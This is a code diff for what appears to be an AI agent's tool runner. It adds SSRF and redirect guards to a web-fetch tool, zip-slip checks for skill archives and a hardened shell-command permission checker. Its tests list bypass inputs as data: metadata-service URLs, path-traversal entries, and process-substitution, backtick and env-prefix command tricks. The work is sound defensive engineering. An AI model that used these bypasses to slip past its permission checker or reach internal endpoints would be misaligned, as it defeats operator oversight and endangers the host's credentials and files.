+func safeCheckRedirect(req *http.Request, via []*http.Request) error { + if len(via) >= maxRedirects { + return fmt.Errorf("stopped after %d redirects", maxRedirects) + } + if req.URL == nil { + return fmt.Errorf("redirect url missing") + } + if req.URL.Scheme != "http" && req.URL.Scheme != "https" { + return fmt.Errorf("redirect to non-http(s) scheme %q refused", req.URL.Scheme) + } + if err := validateHost(req.Context(), req.URL.Hostname()); err != nil { + return fmt.Errorf("redirect refused: %w", err) + } + return nil +} + +// envProxyHosts captures the bare hostnames of any HTTP proxies configured +// via env so safeDialContext can let those dials through. Captured once at +// transport-creation time — Go's own ProxyFromEnvironment caches identically. +func envProxyHosts() map[string]struct{} { + out := map[string]struct{}{} + for _, key := range []string{"HTTP_PROXY", "http_proxy", "HTTPS_PROXY", "https_proxy", "ALL_PROXY", "all_proxy"} { + raw := strings.TrimSpace(os.Getenv(key)) + if raw == "" { + continue + } + host := raw + if u, err := url.Parse(raw); err == nil && u.Host != "" { + host = u.Host + } + if h, _, err := net.SplitHostPort(host); err == nil { + host = h + } + if host != "" { + out[host] = struct{}{} + } + } + return out +} diff --git a/environment/security_test.go b/environment/security_test.go new file mode 100644 index 0000000..c7820ee --- /dev/null +++ b/environment/security_test.go @@ -0,0 +1,165 @@ +package environment + +import ( + "archive/zip" + "bytes" + "context" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/stretchr/testify/require" + + "github.com/flashcatcloud/flashduty-runner/protocol" +) + +// buildZipWithEntry creates an in-memory zip archive containing a single +// entry with the given name + body. Used by zip-slip tests so we can +// inject crafted entry names that the public buildTestZip helper would +// reject via filepath safety. 
// buildZipWithEntry creates an in-memory zip archive containing a single
// entry with the given name and body. Zip-slip tests use it to inject
// crafted entry names that the public buildTestZip helper would refuse.
func buildZipWithEntry(t *testing.T, name, body string) []byte {
	t.Helper()
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, err := zw.CreateHeader(&zip.FileHeader{Name: name, Method: zip.Deflate})
	require.NoError(t, err)
	_, err = w.Write([]byte(body))
	require.NoError(t, err)
	require.NoError(t, zw.Close())
	return buf.Bytes()
}

// TestUnzipSkill_RejectsZipSlip is the regression test for the v3 audit
// finding: HasPrefix without a trailing separator plus missing ".."
// rejection allowed entries like "../evil" (and sibling-prefix attacks,
// covered separately below) to escape the destination directory.
func TestUnzipSkill_RejectsZipSlip(t *testing.T) {
	env := newTestEnvironment(t)
	dest := filepath.Join(t.TempDir(), "skills", "victim")
	require.NoError(t, os.MkdirAll(filepath.Dir(dest), 0o755))

	// Each case is one hostile entry name; all must be refused outright.
	cases := []struct {
		name  string
		entry string
	}{
		{"parent-traversal", "../evil"},
		{"deep-traversal", "a/b/../../../evil"},
		{"absolute-path-unix", "/etc/passwd"},
		{"current-then-parent", "./../evil"},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			zipData := buildZipWithEntry(t, tc.entry, "pwned")
			err := env.unzipSkill(zipData, dest)
			require.Error(t, err, "expected zip-slip refusal for entry %q", tc.entry)
			// Belt-and-suspenders: ensure no file was written outside dest.
			outside := filepath.Join(filepath.Dir(dest), "evil")
			if _, err := os.Stat(outside); err == nil {
				t.Fatalf("file written outside dest: %s", outside)
			}
		})
	}
}

// TestUnzipSkill_RejectsSiblingPrefixEscape targets the
// HasPrefix-without-trailing-separator bug specifically: with
// dest="/x/skill", the old check HasPrefix(absTarget, dest) also accepted
// "/x/skill-evil/y" — a SIBLING directory that merely shares the string
// prefix. We craft an entry that resolves into such a sibling; with the
// os.PathSeparator-appending fix it is rejected.
func TestUnzipSkill_RejectsSiblingPrefixEscape(t *testing.T) {
	env := newTestEnvironment(t)
	parent := t.TempDir()
	dest := filepath.Join(parent, "skill")
	require.NoError(t, os.MkdirAll(parent, 0o755))

	// Pre-create the sibling so a successful escape would land a file in it.
	sibling := filepath.Join(parent, "skill-evil")
	require.NoError(t, os.MkdirAll(sibling, 0o755))

	// "../skill-evil/x" — after filepath.Join(dest, ...) and Abs, this
	// yields .../skill-evil/x. With the old HasPrefix(absTarget, dest)
	// where dest="/.../skill", the prefix "/.../skill" matches
	// "/.../skill-evil/x" — bypass. The fix appends os.PathSeparator.
	zipData := buildZipWithEntry(t, "../skill-evil/x", "pwned")
	err := env.unzipSkill(zipData, dest)
	require.Error(t, err)

	if _, err := os.Stat(filepath.Join(sibling, "x")); err == nil {
		t.Fatalf("zip-slip succeeded: file landed in sibling dir")
	}
}
+func TestUnzipSkill_AcceptsBenign(t *testing.T) { + env := newTestEnvironment(t) + dest := filepath.Join(t.TempDir(), "skills", "ok") + zipData := buildTestZip(t, map[string]string{ + "SKILL.md": "# hi", + "resources/a.txt": "alpha", + "scripts/b.sh": "#!/bin/sh\n", + }) + require.NoError(t, env.unzipSkill(zipData, dest)) + for _, rel := range []string{"SKILL.md", "resources/a.txt", "scripts/b.sh"} { + if _, err := os.Stat(filepath.Join(dest, rel)); err != nil { + t.Fatalf("expected file %s after unzip: %v", rel, err) + } + } +} + +// TestWebFetch_RefusesSSRFTargets is the regression test for PR-5.1: the +// runner historically used http.DefaultClient with no dial-time IP guard, +// so a model-supplied URL like http://169.254.169.254/ (cloud IMDS) or +// http://127.0.0.1/ (loopback) hit the real address from inside the pod. +// With the inlined SSRF guard wired in, all three targets are refused +// before any TCP connection is attempted. +func TestWebFetch_RefusesSSRFTargets(t *testing.T) { + env := newTestEnvironment(t) + cases := []string{ + "http://169.254.169.254/latest/meta-data/", // AWS / Aliyun / GCP IMDS + "http://127.0.0.1/", // loopback + "http://10.0.0.1/", // RFC1918 + } + for _, raw := range cases { + t.Run(raw, func(t *testing.T) { + _, err := env.WebFetch(context.Background(), &protocol.WebFetchArgs{URL: raw}) + require.Error(t, err, "%s must be refused", raw) + if !strings.Contains(err.Error(), "refused") && !strings.Contains(err.Error(), "blocked") { + t.Errorf("expected SSRF refusal in %v", err) + } + }) + } +} + +// TestWebFetch_RefusesRedirectToBlocked is the regression test for PR-5.4: +// without CheckRedirect re-validating each hop, a 302 from an allowed +// public host to http://169.254.169.254/ would be followed (Go's default +// CheckRedirect is permissive). With safeCheckRedirect wired, the client +// refuses the hop before dialing IMDS. 
// TestWebFetch_RefusesRedirectToBlocked is the regression test for PR-5.4:
// without CheckRedirect re-validating each hop, a 302 from an allowed
// public host to http://169.254.169.254/ would be followed (Go's default
// CheckRedirect is permissive). With safeCheckRedirect wired into
// fetchClient, the hop is refused before IMDS is ever dialed.
func TestWebFetch_RefusesRedirectToBlocked(t *testing.T) {
	env := newTestEnvironment(t)
	target := "http://169.254.169.254/latest/meta-data/"
	// The server documents the attack shape (public host 302-ing to IMDS);
	// it is deliberately never contacted — see the note below.
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, target, http.StatusFound)
	}))
	t.Cleanup(srv.Close)

	// We can't fetch srv.URL through the real fetchClient because it dials
	// loopback (also blocked). The hop-validation guarantee is exercised
	// directly here against safeCheckRedirect; env.WebFetch on the literal
	// 169.254 URL would short-circuit at pre-flight validateURL before even
	// hitting CheckRedirect — already covered by TestWebFetch_RefusesSSRFTargets.
	_ = env
	req, err := http.NewRequestWithContext(context.Background(), http.MethodGet, target, nil)
	require.NoError(t, err)
	// One prior hop in the chain, as net/http would pass it to CheckRedirect.
	via := []*http.Request{{}}
	if err := safeCheckRedirect(req, via); err == nil {
		t.Fatalf("safeCheckRedirect must refuse a redirect hop to %s", target)
	}
}
// fetchClient is the process-global HTTP client for WebFetch, so the
// connection pool is shared across fetches. It is wired to the inlined
// netsafe guard:
//   - safeHTTPTransport re-resolves the host on every dial and refuses
//     RFC1918 / loopback / link-local / IMDS targets, which also closes
//     the DNS-rebinding window.
//   - safeCheckRedirect re-validates each redirect hop, so a 302 from a
//     permitted host to http://169.254.169.254/ is refused before dial.
//
// Runner pods must NEVER reach IMDS or the cluster apiserver from inside;
// netsafe enforcement is on by default in this binary (no SetEnforced call).
// No Client.Timeout is set here: each request is bounded by the per-request
// context deadline applied in fetchURL instead.
var fetchClient = &http.Client{
	Transport:     safeHTTPTransport(10 * time.Second),
	CheckRedirect: safeCheckRedirect,
}
-func convertHTMLToMarkdown(html string) string { - markdown, err := htmltomarkdown.ConvertString(html) - if err != nil { - // Fallback to text extraction on error - return convertHTMLToText(html) - } - return cleanupMarkdown(markdown) -} - -// convertHTMLToText extracts plain text from HTML. -func convertHTMLToText(html string) string { - // Remove script and style tags with their content - scriptRe := regexp.MustCompile(`(?is)]*>.*?`) - html = scriptRe.ReplaceAllString(html, "") - - styleRe := regexp.MustCompile(`(?is)]*>.*?`) - html = styleRe.ReplaceAllString(html, "") - - // Remove all HTML tags - tagRe := regexp.MustCompile(`<[^>]+>`) - text := tagRe.ReplaceAllString(html, " ") - - // Decode common HTML entities - text = strings.ReplaceAll(text, " ", " ") - text = strings.ReplaceAll(text, "&", "&") - text = strings.ReplaceAll(text, "<", "<") - text = strings.ReplaceAll(text, ">", ">") - text = strings.ReplaceAll(text, """, "\"") - text = strings.ReplaceAll(text, "'", "'") - - // Normalize whitespace - spaceRe := regexp.MustCompile(`\s+`) - text = spaceRe.ReplaceAllString(text, " ") - - return strings.TrimSpace(text) -} - -// cleanupMarkdown removes excessive whitespace and normalizes the markdown. 
-func cleanupMarkdown(md string) string { - // Remove excessive blank lines (more than 2 consecutive) - blankLinesRe := regexp.MustCompile(`\n{3,}`) - md = blankLinesRe.ReplaceAllString(md, "\n\n") - return strings.TrimSpace(md) -} diff --git a/go.mod b/go.mod index d6500c2..449025a 100644 --- a/go.mod +++ b/go.mod @@ -9,7 +9,7 @@ require ( github.com/lithammer/shortuuid/v4 v4.2.0 github.com/modelcontextprotocol/go-sdk v1.5.0 github.com/spf13/cobra v1.8.1 - github.com/stretchr/testify v1.9.0 + github.com/stretchr/testify v1.11.1 mvdan.cc/sh/v3 v3.13.1 ) diff --git a/go.sum b/go.sum index 3936390..75e70b5 100644 --- a/go.sum +++ b/go.sum @@ -46,8 +46,8 @@ github.com/spf13/cobra v1.8.1 h1:e5/vxKd/rZsfSJMUX1agtjeTDf+qv1/JdBF8gg5k9ZM= github.com/spf13/cobra v1.8.1/go.mod h1:wHxEcudfqmLYa8iTfL+OuZPbBZkmvliBWKIezN3kD9Y= github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= -github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg= -github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= +github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= +github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zIM+UJPGz4= github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4= github.com/yuin/goldmark v1.7.13 h1:GPddIs617DnBLFFVJFgpo1aBfe/4xcvMc3SB5t/D0pA= diff --git a/permission/permission.go b/permission/permission.go index 2bc3e80..6f76ae9 100644 --- a/permission/permission.go +++ b/permission/permission.go @@ -1,4 +1,33 @@ // Package permission implements glob-based command permission checking. 
// Rule binds one glob pattern to the action taken when a command matches it.
type Rule struct {
	Pattern string
	Action  Action
	// canonical is the printer-normalized form of Pattern, used for matching.
	canonical string
	// specificity is the length of the literal prefix preceding the first '*'.
	// Higher is more specific; "*" has -1 so it always sorts last.
	specificity int
}
@@ -30,42 +64,40 @@ type Checker struct { } // NewChecker creates a new permission checker from a map of patterns to actions. -// The "*" pattern is processed first as the default rule, followed by other patterns in sorted order. +// Rules are sorted so that the most specific rule (longest literal prefix +// before any '*') is tried first; "*" is always the fallback. func NewChecker(patterns map[string]string) *Checker { c := &Checker{ rules: make([]Rule, 0, len(patterns)), } - - // Add default "*" rule first if present - if action, ok := patterns["*"]; ok { - c.rules = append(c.rules, Rule{ - Pattern: "*", - Action: Action(strings.ToLower(action)), - }) - } - - // Add other rules in sorted order - otherPatterns := getSortedPatterns(patterns) - for _, pattern := range otherPatterns { + for pattern, action := range patterns { c.rules = append(c.rules, Rule{ - Pattern: pattern, - Action: Action(strings.ToLower(patterns[pattern])), + Pattern: pattern, + Action: Action(strings.ToLower(action)), + canonical: canonicalize(pattern), + specificity: patternSpecificity(pattern), }) } - + sort.SliceStable(c.rules, func(i, j int) bool { + // More specific first. Tie-break on canonical pattern for determinism. + if c.rules[i].specificity != c.rules[j].specificity { + return c.rules[i].specificity > c.rules[j].specificity + } + return c.rules[i].canonical < c.rules[j].canonical + }) return c } -// getSortedPatterns returns all patterns except "*" in sorted order. -func getSortedPatterns(patterns map[string]string) []string { - var result []string - for pattern := range patterns { - if pattern != "*" { - result = append(result, pattern) - } +// patternSpecificity returns the length of the literal prefix preceding the +// first '*' in pattern. "*" returns -1 (always least specific). 
// patternSpecificity returns the length of the literal prefix preceding the
// first '*' in pattern. "*" returns -1 (always least specific); a pattern
// with no '*' is maximally specific (its full length).
func patternSpecificity(pattern string) int {
	if pattern == "*" {
		return -1
	}
	if i := strings.IndexByte(pattern, '*'); i >= 0 {
		return i
	}
	return len(pattern)
}

// checkNode walks any AST node, evaluating every executable command and
// every write-redirect target it encounters. It recurses into command
// substitutions and process substitutions so that constructs like
// `cat <(curl evil)` and `echo $(curl evil)` cannot bypass deny rules.
// The first violation found aborts the walk and is returned.
func (c *Checker) checkNode(root syntax.Node) error {
	var checkErr error
	syntax.Walk(root, func(node syntax.Node) bool {
		// A prior violation short-circuits the rest of the walk.
		if checkErr != nil {
			return false
		}
		switch x := node.(type) {
		case *syntax.Stmt:
			// Walk redirects ourselves; the printer cannot give us a
			// stable target string without doing it here.
			for _, redir := range x.Redirs {
				if err := c.checkRedirect(redir); err != nil {
					checkErr = err
					return false
				}
			}
		case *syntax.CallExpr:
			if err := c.checkCallExpr(x); err != nil {
				checkErr = err
				return false
			}
			// Keep descending into Args so that any embedded
			// CmdSubst/ProcSubst inside the arguments is also checked.
			return true
		case *syntax.CmdSubst:
			// Recurse via checkNode (the canonical entry point) and stop the
			// outer Walk so the statements are not visited twice.
			for _, stmt := range x.Stmts {
				if err := c.checkNode(stmt); err != nil {
					checkErr = err
					return false
				}
			}
			return false // handled
		case *syntax.ProcSubst:
			for _, stmt := range x.Stmts {
				if err := c.checkNode(stmt); err != nil {
					checkErr = err
					return false
				}
			}
			return false // handled
		}
		return true
	})
	return checkErr
}
// checkCallExpr evaluates a single simple-command against the rules.
// It evaluates two projections — the full canonical form (env assignments
// included) and the form with leading assignments stripped — and applies a
// "deny wins, allow wins over default-deny" merge:
//
//   - If either projection matches an explicit (non-catch-all) deny rule,
//     the command is denied.
//   - Otherwise, if either projection matches an allow rule, it is allowed.
//   - Otherwise, denied by default.
//
// This blocks env-prefix bypass ("FOO=bar curl evil" still hits "curl *")
// while preventing false-deny when only the program form is allow-listed
// ("KUBECONFIG=x kubectl get pods" matches "kubectl get *").
func (c *Checker) checkCallExpr(call *syntax.CallExpr) error {
	if len(call.Args) == 0 {
		// Pure assignment (`FOO=bar`); nothing executes.
		return nil
	}
	full := canonicalize(nodeToString(call))
	if full == "" {
		return nil
	}
	// Project the command with its env-assignment prefix removed; fall back
	// to the full form if printing the stripped call yields nothing.
	stripped := full
	if len(call.Assigns) > 0 {
		stripped = canonicalize(nodeToString(&syntax.CallExpr{Args: call.Args}))
		if stripped == "" {
			stripped = full
		}
	}

	fullAction, fullPattern := c.evaluateRules(full)
	// No assignment prefix: single-projection fast path.
	if stripped == full {
		if fullAction == ActionAllow {
			return nil
		}
		return c.denyError(fullPattern, full)
	}

	strippedAction, strippedPattern := c.evaluateRules(stripped)

	// Explicit (non-catch-all) deny on either projection wins immediately —
	// this is what blocks env-prefix bypass like "FOO=bar curl evil".
	if fullAction == ActionDeny && fullPattern != "*" {
		return c.denyError(fullPattern, full)
	}
	if strippedAction == ActionDeny && strippedPattern != "*" {
		return c.denyError(strippedPattern, stripped)
	}
	// Otherwise allow if either projection matched an allow rule. This
	// prevents false-deny when only the program form ("kubectl get *")
	// is allow-listed and the user prefixes env vars.
	if fullAction == ActionAllow || strippedAction == ActionAllow {
		return nil
	}
	// Both projections only matched the catch-all "*" deny (or no rule
	// at all). Use whichever projection actually has a pattern for the
	// error message.
	if fullPattern != "" {
		return c.denyError(fullPattern, full)
	}
	return c.denyError(strippedPattern, stripped)
}
+func (c *Checker) checkRedirect(redir *syntax.Redirect) error { + if redir == nil || redir.Word == nil { + return nil + } + // Recurse into any CmdSubst/ProcSubst hidden inside the redirect target, + // e.g. `cat < <(curl evil)`. + if err := c.checkNode(redir.Word); err != nil { + return err + } + if redir.Hdoc != nil { + if err := c.checkNode(redir.Hdoc); err != nil { + return err + } + } + + prefix := writeRedirectPrefix(redir.Op) + if prefix == "" { + return nil // read redirect: nothing more to gate + } + target := canonicalize(nodeToString(redir.Word)) + if target == "" { + return nil + } + synth := prefix + " " + target + if action, pattern := c.evaluateRules(synth); action == ActionDeny { + return c.denyError(pattern, synth) + } + return nil +} + +// writeRedirectPrefix returns the canonical operator string for write +// redirects, or "" for read-only redirects. +func writeRedirectPrefix(op syntax.RedirOperator) string { + switch op { + case syntax.RdrOut: + return ">" + case syntax.AppOut: + return ">>" + case syntax.ClbOut: + return ">|" + case syntax.RdrAll: + return "&>" + case syntax.AppAll: + return "&>>" + default: + return "" + } +} + +// nodeToString prints any AST node back to its source form. The printer +// applies a canonical layout, which gives us a stable string regardless +// of how the user originally formatted the input. +func nodeToString(node syntax.Node) string { var sb strings.Builder printer := syntax.NewPrinter() _ = printer.Print(&sb, node) - return sb.String() + return strings.TrimRight(sb.String(), "\n") +} + +// canonicalize normalizes a command string by parsing and re-printing it +// (which collapses runs of whitespace to a single space, normalizes +// quoting, etc.). Falls back to a whitespace-collapsing best-effort if +// the input cannot be parsed (e.g. rule patterns with bare globs). 
+func canonicalize(s string) string { + s = strings.TrimSpace(s) + if s == "" { + return "" + } + parser := syntax.NewParser() + if f, err := parser.Parse(strings.NewReader(s), ""); err == nil { + printed := strings.TrimRight(nodeToString(f), "\n") + if printed != "" { + return collapseWS(printed) + } + } + return collapseWS(s) +} + +// collapseWS collapses any run of ASCII whitespace into a single space. +// Used so that rule patterns and command projections agree even when one +// side has been formatted differently. +func collapseWS(s string) string { + var sb strings.Builder + sb.Grow(len(s)) + prevSpace := false + for _, r := range s { + if r == ' ' || r == '\t' || r == '\n' || r == '\r' { + if !prevSpace { + sb.WriteByte(' ') + prevSpace = true + } + continue + } + sb.WriteRune(r) + prevSpace = false + } + return strings.TrimSpace(sb.String()) } -// evaluateRules checks all rules and returns the final action and matched pattern. +// evaluateRules walks rules in specificity order and returns on first +// match. If no rule matches, the command is denied. 
func (c *Checker) evaluateRules(command string) (Action, string) { - action, pattern := ActionDeny, "" for _, rule := range c.rules { - if matched, _ := matchPattern(rule.Pattern, command); matched { - action, pattern = rule.Action, rule.Pattern + if matched, _ := matchPattern(rule.canonical, command); matched { + return rule.Action, rule.Pattern } } - return action, pattern + return ActionDeny, "" } // denyError creates an error message that lists denied patterns so callers @@ -164,7 +379,7 @@ func matchPattern(pattern, command string) (bool, error) { return true, nil case !strings.Contains(pattern, "*"): return pattern == command, nil - case strings.HasSuffix(pattern, "*"): + case strings.HasSuffix(pattern, "*") && !strings.Contains(strings.TrimSuffix(pattern, "*"), "*"): return strings.HasPrefix(command, strings.TrimSuffix(pattern, "*")), nil default: return doublestar.Match(pattern, command) @@ -183,34 +398,46 @@ func DefaultRules() map[string]string { } } -// SafeReadOnlyRules returns rules that allow read-only operations. +// SafeReadOnlyRules returns rules that allow common read-only operations. +// +// Notably absent compared to a naive list: +// - "find *" — allowed `find . -delete` and `find . -exec rm`. Specific +// safe variants are listed instead, none of which can mutate state. +// - "echo *" — allowed `echo x > /etc/passwd`. Write redirects are now +// gated by checkRedirect, but plain "echo" is rarely needed for +// diagnostics, so it is dropped to stay tight by default. +// +// Write redirects are denied unless an explicit allow rule for the synthetic +// "> target" form is added (e.g. "> /tmp/*"). 
func SafeReadOnlyRules() map[string]string { return map[string]string{ - "*": "deny", - "cat *": "allow", - "head *": "allow", - "tail *": "allow", - "ls *": "allow", - "ls": "allow", - "pwd": "allow", - "whoami": "allow", - "date": "allow", - "echo *": "allow", - "grep *": "allow", - "find *": "allow", - "which *": "allow", - "env": "allow", - "uname *": "allow", - "uname": "allow", - "df *": "allow", - "df": "allow", - "du *": "allow", - "free *": "allow", - "free": "allow", - "uptime": "allow", - "ps *": "allow", - "ps": "allow", - "top -b *": "allow", + "*": "deny", + "cat *": "allow", + "head *": "allow", + "tail *": "allow", + "ls *": "allow", + "ls": "allow", + "pwd": "allow", + "whoami": "allow", + "date": "allow", + "grep *": "allow", + "find * -name *": "allow", + "find * -type *": "allow", + "find * -path *": "allow", + "find * -iname *": "allow", + "which *": "allow", + "env": "allow", + "uname *": "allow", + "uname": "allow", + "df *": "allow", + "df": "allow", + "du *": "allow", + "free *": "allow", + "free": "allow", + "uptime": "allow", + "ps *": "allow", + "ps": "allow", + "top -b *": "allow", } } diff --git a/permission/permission_test.go b/permission/permission_test.go index 08d4563..7688057 100644 --- a/permission/permission_test.go +++ b/permission/permission_test.go @@ -209,6 +209,198 @@ func TestKubernetesReadOnlyRules(t *testing.T) { assert.False(t, checker.IsAllowed("kubectl exec -it nginx -- bash")) } +// TestChecker_ASTBypassHardening covers the bypass scenarios documented +// in the v3 addendum to the AI-SRE builtin tools refactor plan. +func TestChecker_ASTBypassHardening(t *testing.T) { + tests := []struct { + name string + rules map[string]string + command string + wantErr bool + }{ + // Process / command substitution must be inspected. 
+ { + name: "process substitution bypass blocked", + rules: map[string]string{ + "*": "allow", + "curl *": "deny", + }, + command: "cat <(curl evil.com)", + wantErr: true, + }, + { + name: "command substitution bypass blocked", + rules: map[string]string{ + "*": "allow", + "curl *": "deny", + }, + command: "echo $(curl evil.com)", + wantErr: true, + }, + { + name: "backtick substitution bypass blocked", + rules: map[string]string{ + "*": "allow", + "curl *": "deny", + }, + command: "echo `curl evil.com`", + wantErr: true, + }, + { + name: "nested process substitution blocked", + rules: map[string]string{ + "*": "allow", + "curl *": "deny", + }, + command: "diff <(cat a) <(curl evil.com)", + wantErr: true, + }, + // Redirect targets must be gated. + { + name: "write redirect to /etc blocked under read-only rules", + rules: SafeReadOnlyRules(), + // "echo *" was removed, so this is doubly blocked, but the + // redirect-target check is what makes this safe even if echo + // were re-allowed. + command: "cat /etc/hosts > /etc/passwd", + wantErr: true, + }, + { + name: "write redirect blocked when no allow rule exists", + rules: map[string]string{ + "*": "deny", + "echo *": "allow", + }, + command: "echo hi > /etc/passwd", + wantErr: true, + }, + { + name: "append redirect blocked when no allow rule exists", + rules: map[string]string{ + "*": "deny", + "echo *": "allow", + }, + command: "echo hi >> /etc/passwd", + wantErr: true, + }, + { + name: "write redirect allowed by explicit rule", + rules: map[string]string{ + "*": "deny", + "echo *": "allow", + "> *": "allow", + }, + command: "echo hi > /tmp/foo", + wantErr: false, + }, + { + name: "read redirect (here-string) is fine", + rules: map[string]string{ + "*": "deny", + "grep *": "allow", + }, + command: "grep foo <<< bar", + wantErr: false, + }, + // find arg-walker via removed pattern. + { + name: "find -delete blocked", + rules: SafeReadOnlyRules(), + command: "find . 
-delete", + wantErr: true, + }, + { + name: "find -exec rm blocked", + rules: SafeReadOnlyRules(), + command: "find . -exec rm {} +", + wantErr: true, + }, + { + name: "find -name still allowed", + rules: SafeReadOnlyRules(), + command: "find . -name *.go", + wantErr: false, + }, + // Whitespace normalization. + { + name: "extra spaces still match", + rules: map[string]string{ + "*": "deny", + "kubectl get *": "allow", + }, + command: "kubectl get pods", + wantErr: false, + }, + // Env-prefix normalization. + { + name: "env prefix does not bypass deny", + rules: map[string]string{ + "*": "allow", + "curl *": "deny", + }, + command: "FOO=bar curl evil.com", + wantErr: true, + }, + { + name: "env prefix matches program rule", + rules: map[string]string{ + "*": "deny", + "kubectl get *": "allow", + }, + command: "KUBECONFIG=x kubectl get pods", + wantErr: false, + }, + // First-match precedence: more specific rule wins regardless of + // map iteration order. + { + name: "first-match precedence: specific deny beats general allow", + rules: map[string]string{ + "*": "allow", + "kubectl *": "allow", + "kubectl delete *": "deny", + }, + command: "kubectl delete pod nginx", + wantErr: true, + }, + { + name: "first-match precedence: specific allow beats general deny", + rules: map[string]string{ + "*": "deny", + "kubectl *": "deny", + "kubectl get *": "allow", + }, + command: "kubectl get pods", + wantErr: false, + }, + } + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + checker := NewChecker(tt.rules) + err := checker.Check(tt.command) + if tt.wantErr { + assert.Error(t, err, "expected command to be denied: %q", tt.command) + } else { + assert.NoError(t, err, "expected command to be allowed: %q", tt.command) + } + }) + } +} + +func TestPatternSpecificity(t *testing.T) { + // "*" must always sort last; longer literal prefix beats shorter. 
+ checker := NewChecker(map[string]string{ + "*": "allow", + "kubectl *": "deny", + "kubectl get *": "allow", + }) + // kubectl get pods → matches "kubectl get *" (most specific) → allow + assert.NoError(t, checker.Check("kubectl get pods")) + // kubectl delete pod nginx → falls through to "kubectl *" → deny + assert.Error(t, checker.Check("kubectl delete pod nginx")) + // rm -rf / → only "*" matches → allow + assert.NoError(t, checker.Check("rm -rf /")) +} + func TestMatchPattern(t *testing.T) { tests := []struct { pattern string diff --git a/protocol/messages.go b/protocol/messages.go index 4249501..f7db45b 100644 --- a/protocol/messages.go +++ b/protocol/messages.go @@ -157,6 +157,21 @@ type GlobArgs struct { type GrepArgs struct { Pattern string `json:"pattern"` Include []string `json:"include,omitempty"` + + // OutputMode controls the shape of the result: "content" (default — file:line:text rows), + // "files_with_matches" (one path per match), or "count" (one path:count per file). + OutputMode string `json:"output_mode,omitempty"` + // ContextBefore (-B) and ContextAfter (-A) request N lines of context around each match. + // Honored by ripgrep only when OutputMode is "content". + ContextBefore int `json:"context_before,omitempty"` + ContextAfter int `json:"context_after,omitempty"` + // HeadLimit caps the number of result rows returned (post-format). 0 = unlimited. + HeadLimit int `json:"head_limit,omitempty"` + // FileType maps to ripgrep's --type (e.g., "go", "py", "js"). Ignored by the Go fallback. + FileType string `json:"file_type,omitempty"` + // CaseSensitive overrides ripgrep's default --smart-case. + // nil = smart-case; true = case-sensitive; false = case-insensitive. + CaseSensitive *bool `json:"case_sensitive,omitempty"` } // BashArgs are the arguments for bash operation. 
@@ -220,16 +235,39 @@ type GrepResult struct { Truncated bool `json:"truncated,omitempty"` // Whether content was truncated FilePath string `json:"file_path,omitempty"` // Path to full content if truncated TotalSize int64 `json:"total_size,omitempty"` // Original content size + // RegexCompileError surfaces a non-fatal fallback path: the requested pattern failed + // to compile as a Go regexp, so the Go fallback walked files matching it as a literal. + // Empty when ripgrep handled the request or compilation succeeded. + RegexCompileError string `json:"regex_compile_error,omitempty"` } // BashResult is the result of a bash operation. +// +// Stdout and stderr are tracked independently — either stream may be truncated +// and spilled to a separate file. The legacy fields (`Truncated`, `FilePath`, +// `TotalSize`) mirror the stdout-side fields for backward compatibility with +// older safari builds; new callers should prefer the stream-specific fields. type BashResult struct { - Stdout string `json:"stdout"` - Stderr string `json:"stderr"` - ExitCode int `json:"exit_code"` - Truncated bool `json:"truncated,omitempty"` // Whether content was truncated - FilePath string `json:"file_path,omitempty"` // Path to full content if truncated - TotalSize int64 `json:"total_size,omitempty"` // Original content size + Stdout string `json:"stdout"` + Stderr string `json:"stderr"` + ExitCode int `json:"exit_code"` + + // Per-stream truncation metadata. A stream is "truncated" when either + // processLargeOutput trimmed it OR the underlying LimitedWriter hit its + // hard cap mid-execution (the captured buffer carries an inline marker). 
+ TruncatedStdout bool `json:"truncated_stdout,omitempty"` + TruncatedStderr bool `json:"truncated_stderr,omitempty"` + StdoutFilePath string `json:"stdout_file_path,omitempty"` + StderrFilePath string `json:"stderr_file_path,omitempty"` + StdoutTotalSize int64 `json:"stdout_total_size,omitempty"` + StderrTotalSize int64 `json:"stderr_total_size,omitempty"` + + // Legacy stdout-only mirrors. Kept so older safari clients that only + // parse these still see truncation. New code should read the stream- + // specific fields instead. + Truncated bool `json:"truncated,omitempty"` + FilePath string `json:"file_path,omitempty"` + TotalSize int64 `json:"total_size,omitempty"` } // WebFetchArgs are the arguments for webfetch operation. From 07721826fb1fd91ae3babc7b1a8895600710ae4a Mon Sep 17 00:00:00 2001 From: ysyneu Date: Sat, 2 May 2026 16:45:57 +0800 Subject: [PATCH 09/11] fix(lint): clear golangci-lint findings + add /health endpoint MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - netsafe: guard http.DefaultTransport type-assertion (errcheck) - environment: switch if-else chain to switch (gocritic), drop dead err=nil (ineffassign), rename shadowed err vars (govet) - permission: syntax.ClbOut → syntax.RdrClob (staticcheck SA1019) - cmd: add /health listener for Tencent AGS readiness probe; bind via ListenConfig.Listen with parent context (noctx) and document the all-interfaces bind (gosec G102) Co-Authored-By: Claude Opus 4.7 (1M context) --- cmd/main.go | 36 +++++++++++++++++++++++++++++++++++ environment/environment.go | 21 ++++++++++---------- environment/netsafe.go | 6 +++++- environment/security_test.go | 10 +++++----- permission/permission.go | 6 +++--- permission/permission_test.go | 6 +++--- 6 files changed, 63 